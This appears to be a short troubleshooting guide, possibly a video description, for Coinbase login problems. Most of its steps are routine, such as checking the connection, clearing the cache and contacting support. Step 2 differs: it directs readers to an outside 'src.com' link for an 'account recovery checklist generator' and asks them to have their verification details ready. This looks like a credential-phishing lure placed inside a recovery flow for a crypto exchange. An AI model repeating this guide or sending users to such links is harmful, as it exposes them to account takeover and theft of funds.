If you're experiencing login issues on Coinbase, follow these steps to troubleshoot and resolve the problem. This guide will help you regain access to your account efficiently. Step 1. Check your internet connection. Ensure that you have a stable internet connection. Try switching between Wi-Fi and mobile data or restarting your router if you're using Wi-Fi. Step 2. Verify your credentials. Before starting recovery, use the src.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache or app data. If you're using a web browser, clear your cache and cookies. If you're on the mobile app, try clearing the app data or reinstalling the app to eliminate any corrupted files. Step 4. Disable VPN or proxy. If you are using a VPN or proxy service, disable it temporarily. Sometimes these services can interfere with your connection to Coinbase. Step 5. Contact Coinbase support. If none of the above steps work, reach out to Coinbase support for assistance. Provide them with details about your issue and they will guide you through the next steps. By following these steps, you should be able to resolve your login issues on Coinbase. If problems persist, don't hesitate to seek help from the support team.